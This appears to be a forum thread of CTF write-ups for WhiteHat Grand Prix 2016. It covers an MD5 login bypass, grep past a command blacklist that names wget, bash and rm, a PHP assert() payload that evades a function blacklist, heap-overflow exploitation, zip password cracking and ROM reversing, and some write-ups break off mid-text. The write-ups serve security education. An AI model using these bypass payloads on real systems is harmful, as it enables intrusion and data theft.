[Writeup] WhiteHat Grand Prix 2016

whf

Super Moderator
Thành viên BQT
06/07/2013
797
1.308 bài viết
[Writeup] WhiteHat Grand Prix 2016
Topic này được tạo để các bạn chia sẻ, trao đổi, thảo luận về Writeup các bài thi tại WhiteHat Grand Prix 2016. Các bạn cùng tham gia nhé!

Các bài thi gồm có:
STTTên món ănWriteup1Tên độiWriteup2Tên đội
1Bánh bèo bì Bình Dương
2Bánh bột chiên
3Bánh bột lọcWriteup[/URL]rawsec
4Bánh căn Ninh ThuậnWriteup[/URL] p4Writeup[/URL]CLGTftMeePwn
5Bánh canh Trảng Bàng – Tây NinhWriteup[/URL]CLGTftMeePwn
6Bánh ChưngWriteup[/URL]CLGTftMeePwn
7Bánh cóng Sóc TrăngWriteup[/URL]CLGTftMeePwn
8Bánh cuốn Thanh TrìWriteup[/URL]qtWriteup[/URL]ISITDTU
9Bánh đa kế Bắc GiangWriteup[/URL]rawsec
10Bánh GiàyWriteup[/URL]rawsecWriteup[/URL]ISITDTU
11Bánh ít lá gai Quy NhơnWriteup[/URL]rawsec
12Bánh khọt Bà Rịa – Vũng Tàu
13Bánh mìWriteup[/URL]ISITDTU
14Bánh phu thê Đình Bảng
15Bánh răng bừa Hưng Yên
16Bánh tằm bì Bạc Liêu
17Bánh tráng cuốn thịt heo Đà NẵngWriteup[/URL]qt
18Bánh xèoWriteup[/URL]ISITDTU
19Bún bò Huế
20Bún bò Nam BộWriteup[/URL]217
21Bún chả Hà NộiWriteup[/URL]ISITDTU
22Cao lầuWriteup[/URL]217
23Cao lầu Hội An
24Chả cá lã vọng
25Cháo lươn Nghệ An
26Cơm gà Hội AnWriteup[/URL]DauGau
27Cơm hến Thừa Thiên HuếWriteup[/URL]LS
28Cơm tấm Sài Gòn
29Gỏi cuốn
30Lẩu mắm U Minh
31Mì QuảngWriteup[/URL]ISITDTU
32Nem ránWriteup[/URL]DauGau
33Phở Hà Nội
34Phở khô Gia Lai
35Xôi ngũ sắc Tây Bắc
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Banh bot loc

Category Web Security | Teams having solved this 108 | Point 100 | Author: WhiteHat Wargame | Writeup: rawsec

Description:



Solution:

Here is the home page:
14899399531.png




The login link go to http://web05.grandprix.whitehatvn.co...password=guest and says noob.
14899399532.png





Let’s see source code of teh web page:

Mã:
    hello
    
    [URL="index.php?username=guest&password=guest"]login[/URL]
    Login to get our secret

Ok, let’s see index.php.bak:

Mã:

Ok so the login checks that the concatenation of the username and the key is equal to the md5 hash of the password.

So we need to find a hash like ????????????????????????????1337 (28 random hex chars and 1337).

I first thought to download a md5 hash dictionary but I didn’t wanted to wait during teh download.

So I went to md5db.net and looked for a hash beginning with 0000, did a CTRL + F to find 1337 and finaly found one: # 13381 Hash 0000dd456d15560290351cb4e6311337 Word hdtfz.

So we get:
  • username: 0000dd456d15560290351cb4e631
  • key: 1337
  • password: hdtfz
I submited the url: http://web05.grandprix.whitehatvn.co...password=hdtfz and got the flag

Mã:
WhiteHat{92ab818618fee438a1ea3944b5940237975f2b1d}
14899399533.png




1.png

2.png

3.png
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Banh da Ke


Category Miscellaneous | Teams having solved this 50 | Point 100 | Author: WhiteHat Wargame | Writeup: rawsec

Description:


When you gather all part of flag. Let's submit: WhiteHat{SHA1(flag)}
nc misc04.grandprix.whitehatvn.com 23403
nc bakmisc04.grandprix.whitehatvn.com 23403
http://material.grandprix.whitehatvn...9fc4fabb47.zip
http://bakmaterial.grandprix.whiteha...9fc4fabb47.zip
Alternative server on amazon in case of low traffic:

http://54.183.97.137/gp2016/Misc04_b...9fc4fabb47.zip

create_folder_player.py

Mã:
import os
import random
flag = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
count = 0
length = len(flag)
print length
arr = random.sample(range(0,10000),length)
arr = sorted(arr)
for k in range(0,10000):
    try:
        os.mkdir(str(k))
    except:
        pass
    if k in arr:
        f=open("./"+str(k)+"/"+os.urandom(8).encode("hex")+"."+os.urandom(8).encode("hex"),"w").write(str(flag[count]))
        count +=1

mics.py

Mã:
#!/usr/bin/env python
import os
import re
import sys
blaclist = "cat|nano|less|tail|vim|head|apt|install|wget|more|emacs|vi|subl|pico|bash|sh|rm|sed|nl|flag.hihi|`|%|\$|chmod|python"
myregrex = "\W*(?i)("+blaclist+")\W*"
cmd = ""
while(cmd != "exit"):
    sys.stdout.write("Input your command: \n")
    sys.stdout.flush()
    cmd = raw_input()
    check = re.findall(myregrex,cmd)
    if check!=[]:
        sys.stdout.write("rejected\n")
        sys.stdout.flush()
        continue
    try:
        #call()
        a ="XXXXXXXXXXXXX"
        a+=cmd
        os.system(a)
    except:
        sys.stdout.write("bad command\n")
        sys.stdout.flush()

Solution:

create_folder_player.py: there will be 10000 folders with one part of the flag in several of them choosen randomly.
  • misc.py: lol, the spell. blaclist vs blacklist.
  • misc.py: ok seriously, blacklist usage sucks so I wont do a script to send a ls for the all 10000 folders. I will simply find a command not blacklisted: grep.
  • grep is magic, you can use all kind of regex and use it recursively:
Mã:
Input your command:
grep -r -E '*.*' .
./5256/7e8e1adc2c27d5ae.b20d7fe2eeee83a6:e
./5363/049185c04d8d4a6a.14b749db725281b6:p
./9149/e60247d6e9b86d66.538088287218f418:h
./6625/99c4b89e33717d68.4e7cfddc3ab792ab:m
./2961/af1fa87c94746adc.4ceba2ad4425295a:H
./5360/3b1d1d39b7cdfc5e.b3d700c19f7da568:3
./7520/be92bc1c03188333.8a0acf56d05e21f2:D
./9460/0990eb1ff5a0f0f4.2b8448627eda707d:4
./7261/85c5e9b11412182b.c8aa64a3e89d6116:4
./4464/bfb49af4d0d18330.0e0a92989ea0cd16:{
./8447/1383404de7cf99d1.801ee7e580554bf7:r
./9817/abb9dad1b91251c0.8aca51ae85b0a5a3:}
./2464/91001f84e6b7043c.362d39207f7113d5:e
./6089/0da7f2cf81b578bc.64aceb97e90d59b8:4
./7265/0d1d93183a71652c.f62fd332e6a893c7:n
./8042/45b7f42e37a7036d.4649801c191cd850:t
./8566/eb0eac89c6af6941.a01ee5abd0018d64:y
./1490/ce66a0652ef071e2.8e59cb623f5044db:i
./3391/d5bb02174118cd0a.8452e896dc972780:a
./9729/ff958bf095684403.ba220df0c0a00cbc:d
./5627/39835fcae4e0fb1e.d63a2b4f7cd6cc4d:_
./5754/01b98e405d1a6f5e.dfea13f68bf1d28c:c
./2124/0388bdb00dff778b.cf361e5e8cba7330:t
./8919/8b998e1b2d84792e.05c56576bc8a640c:_
./251/01fbe27318a591b2.32905c5f1c5d5be2:W
./6805/421c3e7b161f09e6.cb2d792b88d852d3:_
./7615/40672c2915963dc7.23d290b7ab5a23fe:_
./4983/29a3e67904c136c1.82698942425d3172:k
./4091/5d4d11679777c463.54a739cf22f2147f:t
./1477/76ed9a66da76f47c.fffc5ebba341f304:h
./6428/4ab16af8f7bea2ca.f326ac02efddd099:l
./9664/3a309f1c601603e8.949523481193df68:r
  • Save the output in a text file.
  • Let’s order that with a ruby script:
Mã:
#!/usr/bin/ruby
arr = []
File.open('misc04.txt').each do |line|
    # math the folderName, fileName and content of each file (one char)
    regex = line.match(/\/([0-9]{1,4})\/([a-f0-9]{16}\.[a-f0-9]{16}):(.)/)
    folderName = regex.captures[0]
    fileName = regex.captures[1]
    char = regex.captures[2]
    # convert folderName to int in order to be able to sort it the right way. Sort as int (2464 > 251), sort a string (2464 < 251).
    arr.push([folderName.to_i,fileName,char])
end
# sort by first col, so sort by fileName
arr.sort!
# display only chars (third column of each row)
arr.each{|r| print r[2]}
  • Execute it:
Mã:
[noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
$ ruby sorted.rb
WhiteHat{ke3p_c4lm_4nD_try_h4rd}
  • Format the flag (WhiteHat{SHA1(flag)}):
Mã:
[noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
$ printf %s 'WhiteHat{ke3p_c4lm_4nD_try_h4rd}' | sha1sum
1a05093adb0795d8e2f5b89985c43b85bcb11d19  -
  • Submit the flag: WhiteHat{1a05093adb0795d8e2f5b89985c43b85bcb11d19}.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
[h=4]Banh can[/h] Category Web Security | Teams having solved this 29 | Point 100 | Author: WhiteHat Wargame| Writeup: p4

Description:



Solution:

In the task we get a webpage with a form. We can input some data in the form and submit it, which causes redirection to:

Mã:
http://web04.grandprix.whitehatvn.com/index.php?hello=our_input

And it prints out Hello our_input.

There is also a hint in the source code that we can try calling function hint.

After a while we figure out that the parameter name is the function name and the value is string argument. This means we can go to:

Mã:
http://web04.grandprix.whitehatvn.com/index.php?hint

To call hint function. This functions shows us that there is a blacklist for some inputs:

Mã:
$blacklist = array("system", "passthru", "exec", "read", "open", "eval", "backtick", "", "_");`

We quickly notice that there is one function missing here, which enables us to call any PHP code from a string parameter -assert.

So we can call:

Mã:
http://web04.grandprix.whitehatvn.com/index.php?assert=phpinfo()

And it shows us phpinfo, with list of all disabled PHP functions. It seems there is no way of getting a shell, but maybe we don't need it. We decide to read index.php just to see what exactly we're dealing with.

While _ is blacklisted, we can just concatenate string with chr(95) instead so we call:

Mã:
http://web04.grandprix.whitehatvn.com/index.php?assert=assert(%27print(file%27.chr(95).%27get%27.chr(95).%27contents(%22index.php%22))%27)

in order to call assert('file_get_contents("index.php")')

and the flag is in the source code:

Mã:
WhiteHat{36b32e1f18a0da66de3b9dd29db947155b35320f}
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Com ga Hoi An

Category Reverse Engineering | Teams having solved this 2 | Point 100 | Author: WhiteHat Wargame| Writeup: DauGau

Description:



Solution:
[video=youtube;yv8-A-ftgvA]https://www.youtube.com/watch?v=yv8-A-ftgvA[/video]​
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Nem ran

Category Reverse Engineering | Teams having solved this 35 | Point 100 | Author: WhiteHat Wargame | Writeup: DauGau

Description:


Solution:
[video=youtube;ssMRYIPUzNM]https://www.youtube.com/watch?v=ssMRYIPUzNM[/video]​
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Cảm ơn Mod whf đã tổng hợp, các đội có thể gửi luôn writeup vào đây.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Cảm ơn bài writeup của mod Sugi_b3o! Đối với những bài đã có writeup nhưng anh em có cách giải khác thì cứ mạnh dạn chia sẻ nhé.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Cao lau

Category: Pwnable | Teams having solved this: 1 | Point: 400 | Author: WhiteHat Wargame | Writeup: 217

Description:

nc pwn02.grandprix.whitehatvn.com 23502

nc bakpwn02.grandprix.whitehatvn.com 23502

http://material.grandprix.whitehatvn...18ef6b0868.zip

http://bakmaterial.grandprix.whiteha...18ef6b0868.zip

Alternative server on amazon in case of low traffic:

http://54.183.97.137/gp2016/Pwn02_cd...18ef6b0868.zip
Solution:

Basic Info

Attachments are two 32bit ELFs and one plaintext: note_trial_1, ptrace_32, blacklist.txt
14899399534checksec.png




The note_trial_1 binary is Full RELRO but no PIE enable. While it do have canary, the checksec of pwntools might have bugs.

The ptrace_32 binary is a sandbox, which use ptrace to forbid its child(i.e note_trial_1) from using syscalls listed inblacklist.txt.

We will see the forbidden syscalls later, let's focus on functions of note_trial_1 first.

Functions

(Only important functions are listed)
  • Initialize notes:
Mã:
/*
struct Note {
  char name[32];
  char date[32];
  char body[300];
}; */
for(i = 0; i name, 32)
[*]readline(note->date, 32)
[*]readline(note->body, 300)
[/LIST]
[*]read:
[LIST]
[*]Input index
[*]Show contents of pool[index].
[/LIST]
[*]teencode:
[LIST]
[*]Input index
[*]note = pool[index];
[*]convert content of note->body to leetcode(e.g. A->4, C->[, M->|V|).
[/LIST]
[*]license:
[LIST]
[*]return if cafe != 0xcafebabe
[*]If input the correct five number license, will have [B]format string vulnerability[/B].
[*]cafe = 0xc4f3b4b3
[/LIST]
[/LIST][B]Vulnerability[/B]

One vulnerability has been described above: if input the correct license then we can use the [URL="https://www.owasp.org/index.php/Format_string_attack"]fmt string attack[/URL].

However, we don't know what the correct license is - if we don't know the random seed.

Another vulnerability is the command teencode, which converts M to |V|, K to |
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bun bo Nam Bo

Category: Pwnable | Teams having solved this: 2 | Point: 500 | Author: WhiteHat Wargame | Writeup: 217

Description:



Solution:

Basic Info

Attachments are two 32bit ELF note, note_client and glibc libc-2.19
14899399531.png




Normal protection, no PIE and Partial RELRO.

Directly run binary note will face a punch of hex:
14899399532.png




While it looks like as normal menu challenge in IDA:
14899399533.png




Why there's hex code when running?

After analysis, all I/O in note has been encrypt/decrypt in some way:
14899399534.png



Let's skip here, and see what does note_client do first:

Directly run will get:
14899399535.png



With IDA we found it want to read a file named config.txt, and connect the host:port described in config.txt.

So we create config.txt with content 127.0.0.1 31337, and use ncat to create a socket service of note listen at 127.0.0.1:31337, then note_client:
14899399536.png



It works!

Actually note_client just do the I/O encrypt/decrypt to communicate with note. So we can skip the enc/dec algorithm in note now and just use note_client to interact with note.

Info of note
  • Initialize: pool = (Pool*)malloc(0x1000), with structure:
Mã:
struct Pool
{
  int limit;
  int alive_amount
  Note note[255];
};
struct Note
{
  int inuse;
  int sz;
  char *content;
};

Don't care limit, alive_amount, they are used for limit the amount of note not exceed 255.

Commands:
  • list: print the content of notes with inuse is true
  • read:
    1. check index is valid
    2. check note[index]->inuse is true
    3. show its date/name/body
  • add: create a new note, steps show as follows:
    1. loop pool to find the first note with inuse is false
    2. Input a size, 32 content, 31)
    3. Input date:readn(note->content+32, 15)
    4. Input body: readn(note->content+48, size)
    5. note->inuse = true
    6. note->sz = size
  • free: specific a index
    1. check index is valid
    2. check note[index]->inuse is true
    3. free(note[index]->content)
    4. note->inuse = false
  • edit: specific a index
    1. check index is valid
    2. check note[index]->inuse is true
    3. Input name:readn(note->content, 31)
    4. Input date:readn(note->content+32, 15)
    5. Input body: readn(note->content+48, note->sz)
Vulnerability

There're many incorrect bounding check in note, but all of them are few dangers. The only crackable vulnerability is there's a buffer overflow in input function. The implementation of input looks like this: (not exactly because there's decrypt algo. in origin, follows is a simplified version):

Mã:
void readn(char *output, int len) {
  int i=0, c;
  while((c = getchar()) != '\n') {
    output[i++] = c;
    if(i >= len) break;
  }
  output[i] = c;
}

If the input length is exactly len and the last character is not line break, then will cause one null-byte overflow.

Exploit

Remain is our favorite heap exploit.


Information Leak

Since we can only overflow one null-byte, we must overflow the size of next heap chunk. First use the command add to construct our heap layout:

After add(36); add(36); add(316); add(36); add(36), heap will look like this:

Mã:
+---------------+---------+---------+------------------+---------+---------+-----------+
| pool: 0x1009  | 0: 0x59 | 1: 0x59 |     2: 0x171     | 3: 0x59 | 4: 0x59 | top_chunk |
+---------------+---------+---------+------------------+---------+---------+-----------+

Then free the first note(free(0)), and trigger overflow when editing the second note(edit(1)):

Mã:
           |------- 0xb0 ------|
+----------+---------+---------+----------------+-+---------+---------+-----------+
|  0x1009  | 0: 0x59 | 1: 0x58 | 2: 0x100(fake) | | 3: 0x59 | 4: 0x59 | top_chunk |
+----------+---------+---------+----------------+-+---------+---------+-----------+
           |  freed  |         | prev_size(0xb0)| |
           +---------+         +----------------+-+

Since the chunk size of note 2 has been changed to 0x100, which implys its prev_inuse bit is zero, now free it(free(2)) will trigger the chunk merge between note 0 and note 2:

Mã:
+----------+---------+---------+-----------+------+---------+---------+-----------+
|  0x1009  |            0x1b1              | 0x70 | 3: 0x59 | 4: 0x59 | top_chunk |
+----------+---------+---------+-----------+------+---------+---------+-----------+
                     | 1: 0x58 |
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
[h=4]Banh Giay[/h] Category Forensics | Teams having solved this 14 | Point 100 | Author: WhiteHat Wargame | Writeup: rawsec

Description:



Solution:
  • Download the zip.
  • Extract it.
  • Open the pcapng with Wireshark.
  • Filter http requests.
  • See frame n°134 GET /corporation/secret HTTP/1.1.
  • Extract the file (File > Export Objects > HTTP).
  • Check the type of file:
Mã:
[noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
$ file secret
secret: Zip archive data, at least v2.0 to extract
  • Unzip it:
Mã:
[noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
$ unzip secret
Archive:  secret
[secret] EasyExtrack password:
  • Ok, there is a pasword, let’s check the html page: frame n°149 GET /corporation/arsenal.html HTTP/1.1.
  • Extract it from the pcapng.
  • See the hint: For H.i.n.t: Referring to arsenal, i remember a number. It also length of secret p.a.s.s.w.o.r.d.
  • One key event is:
  • With luck and guessing I found this number was 4.
  • So now let’s try to crack the zip password with fcrackzip:
Mã:
[noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
$ fcrackzip -b -c a -l 4 -u secret
PASSWORD FOUND!!!!: pw == fuzu
  • Extract the zip with the password.
  • Check what file type EasyExtrack is:
Mã:
[noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
$ file EasyExtrack
EasyExtrack: Zip archive data, at least v1.0 to extract
  • Try to unzip it with the same password:
Mã:
[noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
$ unzip EasyExtrack -d out
Archive:  EasyExtrack
   creating: out/EasyExtrack/
[EasyExtrack] EasyExtrack/flag1.txt password:
  inflating: out/EasyExtrack/flag1.txt  
  inflating: out/EasyExtrack/flag10.txt  
  inflating: out/EasyExtrack/flag11.txt  
  inflating: out/EasyExtrack/flag12.txt  
  inflating: out/EasyExtrack/flag13.txt  
  inflating: out/EasyExtrack/flag14.txt  
  inflating: out/EasyExtrack/flag15.txt  
  inflating: out/EasyExtrack/flag16.txt  
  inflating: out/EasyExtrack/flag17.txt  
  inflating: out/EasyExtrack/flag18.txt  
  inflating: out/EasyExtrack/flag19.txt  
  inflating: out/EasyExtrack/flag2.txt  
  inflating: out/EasyExtrack/flag20.txt  
  inflating: out/EasyExtrack/flag21.txt  
  inflating: out/EasyExtrack/flag22.txt  
  inflating: out/EasyExtrack/flag23.txt  
  inflating: out/EasyExtrack/flag24.txt  
  inflating: out/EasyExtrack/flag25.txt  
  inflating: out/EasyExtrack/flag26.txt  
  inflating: out/EasyExtrack/flag27.txt  
  inflating: out/EasyExtrack/flag28.txt  
  inflating: out/EasyExtrack/flag29.txt  
  inflating: out/EasyExtrack/flag3.txt  
  inflating: out/EasyExtrack/flag30.txt  
  inflating: out/EasyExtrack/flag4.txt  
  inflating: out/EasyExtrack/flag5.txt  
  inflating: out/EasyExtrack/flag6.txt  
  inflating: out/EasyExtrack/flag7.txt  
  inflating: out/EasyExtrack/flag8.txt  
  inflating: out/EasyExtrack/flag9.txt
  • Here are all the flags:
Mã:
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{12f54a96f6444324693t0da001cafda8b}
raw: Flag{60b725f10c9c85c70d9h7880dfe8191b3}
raw: Flag{f5302386464f953ed58u1edac03556e55}
raw: Flag{d9bed3b7e151f11b8fdyadf75f1db96d9}
raw: Flag{3b5d5c3712955042212n316173ccf37be}
raw: Flag{72cfd272ace172fa3502h6445fbef9b03}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{9a8ad92c50cae39aa2c5604pfd0ab6d8c}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{d2a33790e5bf28b33cdxbf61722a06989}
raw: Flag{12f54a96f64443s246930da001cafda8b}
raw: Flag{92520a5a9cf8932i20b9cd447f585f144}
raw: Flag{01fbdc44ef819db6p273bc30965a23814}
raw: Flag{9ffbf43126e33be52hcd2bf7e01d627f9}
raw: Flag{12f54a96f644432469o30da001cafda8b}
raw: Flag{9d7bf075372908f55e2nd945c39e0a613}
raw: Flag{92520a5a9cf893220b9cud447f585f144}
raw: Flag{009520053b00386d1173fu3988c55d192}
raw: Flag{e73af36376314c7c0022cbk1d204f76b3}
raw: Flag{e85dde330c34efb0e526ee3j082e4353b}
raw: Flag{7d9d25f71cb8a5aba8620254l0a20d405}
  • Flags are not hashes because they are 33 char long. But we can see there is one non-hex char in each flag.
  • Remove each non-hex flag to get 32 char long MD5 hashed:
Mã:
d2a33790e5bf28b33cdbf61722a06989
12f54a96f64443246930da001cafda8b
60b725f10c9c85c70d97880dfe8191b3
f5302386464f953ed581edac03556e55
d9bed3b7e151f11b8fdadf75f1db96d9
3b5d5c3712955042212316173ccf37be
72cfd272ace172fa35026445fbef9b03
d2a33790e5bf28b33cdbf61722a06989
d2a33790e5bf28b33cdbf61722a06989
d2a33790e5bf28b33cdbf61722a06989
9a8ad92c50cae39aa2c5604fd0ab6d8c
d2a33790e5bf28b33cdbf61722a06989
d2a33790e5bf28b33cdbf61722a06989
d2a33790e5bf28b33cdbf61722a06989
d2a33790e5bf28b33cdbf61722a06989
d2a33790e5bf28b33cdbf61722a06989
d2a33790e5bf28b33cdbf61722a06989
d2a33790e5bf28b33cdbf61722a06989
d2a33790e5bf28b33cdbf61722a06989
12f54a96f64443246930da001cafda8b
92520a5a9cf893220b9cd447f585f144
01fbdc44ef819db6273bc30965a23814
9ffbf43126e33be52cd2bf7e01d627f9
12f54a96f64443246930da001cafda8b
9d7bf075372908f55e2d945c39e0a613
92520a5a9cf893220b9cd447f585f144
009520053b00386d1173f3988c55d192
e73af36376314c7c0022cb1d204f76b3
e85dde330c34efb0e526ee3082e4353b
7d9d25f71cb8a5aba86202540a20d405
  • The extracted wrong letters are (in order): xthuynhxxxpxxxxxxxxsiphonuukjl.
  • Use hashkiller.co.uk to decrypt MD5 hashes:
Mã:
    d2a33790e5bf28b33cdbf61722a06989 MD5 : F
12f54a96f64443246930da001cafda8b MD5 : l
60b725f10c9c85c70d97880dfe8191b3 MD5 : a
f5302386464f953ed581edac03556e55 MD5 : g
d9bed3b7e151f11b8fdadf75f1db96d9 MD5 : {
3b5d5c3712955042212316173ccf37be MD5 : b
72cfd272ace172fa35026445fbef9b03 MD5 : r
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
9a8ad92c50cae39aa2c5604fd0ab6d8c MD5 : f
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
d2a33790e5bf28b33cdbf61722a06989 MD5 : F
12f54a96f64443246930da001cafda8b MD5 : l
92520a5a9cf893220b9cd447f585f144 MD5 : _
01fbdc44ef819db6273bc30965a23814 MD5 : h
9ffbf43126e33be52cd2bf7e01d627f9 MD5 : e
12f54a96f64443246930da001cafda8b MD5 : l
9d7bf075372908f55e2d945c39e0a613 MD5 : p
92520a5a9cf893220b9cd447f585f144 MD5 : _
009520053b00386d1173f3988c55d192 MD5 : y
e73af36376314c7c0022cb1d204f76b3 MD5 : o
e85dde330c34efb0e526ee3082e4353b MD5 : u
7d9d25f71cb8a5aba86202540a20d405 MD5 : }
  • Unformated flag is: Flag{brFFFfFFFFFFFFl_help_you}.
  • SHA1 the unformated flag:
Mã:
[noraj@rawsec]–––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/out/EasyExtrack]
$ printf %s 'Flag{brFFFfFFFFFFFFl_help_you}' | sha1sum
e7643ccd180c84176ae0b4361c3b169fceacf961  -
  • Format the flag: WhiteHat{e7643ccd180c84176ae0b4361c3b169fceacf961}.
  • Not the good flag …
Note that 800618943025315f869e4e1f09471012 is the right md5 hash for F andd2a33790e5bf28b33cdbf61722a06989 is the wrong md5 hash for F that you can obtain with non POSIX tools like echo (that’s why I use printf). So only hashkiller knows both wrong and right hash, all other md5 decrypt online tools knows only the right one so they are not able to decrypt d2a33790e5bf28b33cdbf61722a06989. But anyway…
  • You know what? After some wasted hours I figured that I needed to replace F with some guessed letters:Flag{bruteforce_will_help_you}. Yes guessing again.
  • SHA1 the unformated flag:
Mã:
[noraj@rawsec]–––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/out/EasyExtrack]
$ printf %s 'Flag{bruteforce_will_help_you}' | sha1sum
1e71b26aa01733cd13e5199386c70fe31df43deb  -
  • Format the flag: WhiteHat{1e71b26aa01733cd13e5199386c70fe31df43deb}.
  • Not the good flag …
  • Description said Submit: WhiteHat{SHA1(flag)}, it depends if flag means Flag{xxx} or xxx.
  • SHA1 the unformated flag:
Mã:
[noraj@rawsec]–––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/out/EasyExtrack]
$ printf %s 'bruteforce_will_help_you' | sha1sum                                                                    
31bd8aa56447ea1c703d0943e175a06a5c4ee614  -
  • Format the flag: WhiteHat{31bd8aa56447ea1c703d0943e175a06a5c4ee614}.
  • This time this is the good one.
Here was my ruby script:

Mã:
#!/usr/bin/ruby
(1..30).each do |num|
    raw_flag = File.read('flag'+num.to_s+'.txt')
    # Not sanitized flags
    puts 'raw: '.concat(raw_flag)
    only_flag = raw_flag.match(/\{([a-z0-9]{33})\}/).captures[0]
    # Sanitized flags
    puts only_flag.gsub(/[^0-9a-fA-F]/, '')
end
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Writeup bài Cơm hến by LS



Summary: Reverse engineering of a Game Boy ROM and computation of the key with Z3.

Tools:
This is a write-up for the “Com hen” challenge from WhiteHat GrandPrix 2016 CTF.

The provided binary is a Game Boy ROM prompting for a key:





Inputting a wrong key results in this:






I started by looking at the strings:






This sure looks interesting but there is no xrefs for these strings. However, searching for immediate values leads us to an interesting function with two basic blocks at the end:





Since each of these basic blocks are referencing respectively success and fail strings, we can safely assume that sub_1DDD is used to print strings.

After some renaming and immediate to offset conversions we end up with the following:





Let’s see the code path we need to follow to end in the success basic block:





The first check is in the first basic block. In order to get some context, I am putting a breakpoint at 0x5A6 in BGB and provide the following input:
ABCDEFGHIJKLMNOPQRSTUVWXYZ




When the breakpoint triggers, we can see that the code is actually comparing the byte at 0xC0B7 to 0x45, ie, the 24th char of our input must be an ‘E’.

Also, we can see that our input is stored at 0xC0A0 and that there is the following 32 bytes string at 0xC0D2:
3YU8UV86XYZY4W4659756ZUY69582043
Back to our function, the second check depends on the “de” register which is set by sub_86A:





Which is nothing more than a string compare function, loading two strings from the stack and outputting the result in the “de” register.

Now let’s get some context with a breakpoint at 0x86A and the following input (‘E’ at the 24th position in order to pass the first check):
ABCDEFGHIJKLMNOPQRSTUVWEYZ




The two compared strings are at 0xC0A0 and 0xC0D2, ie, our input and the mysterious 32 bytes string.

Moreover, our input changed, it is now:

VWXYZABCDEFGHIJKLMNOPQRZTU

Looks like a dumb ROT(21). However, trying to input ROT(-21, “3YU8UV86XYZY4W4659756ZUY69582043”) as key does not work.

I then started to look at sub_4E0 since it is the only function that is called between the first check and the strcmp.

The function is rather long, but after some RE, the algorithm is actually quite simple. Here is the equivalent C code:

Mã:
